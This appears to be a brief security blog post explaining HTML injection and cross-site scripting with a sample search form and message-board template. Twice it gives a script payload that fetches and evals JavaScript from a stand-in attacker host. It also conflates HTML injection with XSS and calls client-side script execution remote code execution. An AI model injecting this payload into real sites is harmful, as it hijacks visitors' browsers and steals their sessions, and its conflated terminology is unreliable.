Html Injection To Remote Code Execution

Aditya Chauhan
2 min readFeb 14, 2023

--

HTML Injection, also known as Cross-site Scripting (XSS), is a web security vulnerability that allows attackers to inject malicious code into web pages viewed by other users. If not properly addressed, HTML injection can lead to Remote Code Execution (RCE), where an attacker can execute arbitrary code on the server or client-side. In this blog, we will explore HTML injection to RCE and provide examples and code snippets to demonstrate how this vulnerability can be exploited.

HTML Injection Basics

HTML injection occurs when an attacker is able to inject malicious code into a web page that is then executed by the user’s browser. This can be done through various means, including input fields, URLs, and cookies. Once the code is executed, the attacker can steal sensitive information, perform actions on behalf of the user, or even take control of the user’s browser.

To understand how HTML injection works, consider the following code snippet:

<form method="POST" action="/search">
<label for="query">Search:</label>
<input type="text" name="query" id="query">
<button type="submit">Submit</button>
</form>

This code creates a simple search form where a user can enter a search query and submit it to the server. However, if an attacker is able to inject HTML code into the search query, it can be executed by the user’s browser, leading to potential security issues.

HTML Injection to RCE

If an attacker is able to inject JavaScript code into a web page, they can use this to execute arbitrary code and achieve RCE. For example, consider the following search query:

<script>console.log("Hello, world!");</script>

If this query is submitted to the server and displayed in the search results, the JavaScript code will be executed by the user’s browser, displaying “Hello, world!” in the browser’s console. However, an attacker can use this technique to inject more malicious code, such as:

<script>fetch("https://attacker.com/malware.js").then(res => res.text().then(eval))</script>

This code fetches a JavaScript file from the attacker’s server, then executes it using the eval function. This allows the attacker to execute arbitrary code on the client-side, including stealing cookies, modifying the page content, or even redirecting the user to a malicious website.

Code Example

To demonstrate HTML injection to RCE, consider the following code snippet for a simple message board:

<!DOCTYPE html>
<html>
<head>
<title>Message Board</title>
</head>
<body>
<h1>Message Board</h1>
<form method="POST" action="/message">
<label for="message">Enter your message:</label>
<input type="text" name="message" id="message">
<button type="submit">Submit</button>
</form>
<ul>
{% for message in messages %}
<li>{{ message }}</li>
{% endfor %}
</ul>
</body>
</html>

This code creates a simple message board where users can post messages and view previous messages. However, if an attacker is able to inject HTML code into the message input field, it can be displayed to other users and executed in their browsers.

To exploit this vulnerability, an attacker could inject the following code:

<script>fetch("https://attacker.com/malware.js").then(res => res.text().then(eval))</script>

This code fetches a JavaScript file from the attacker’s server and executes it using the eval function. This allows the attacker to execute arbitrary code on the client-side

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher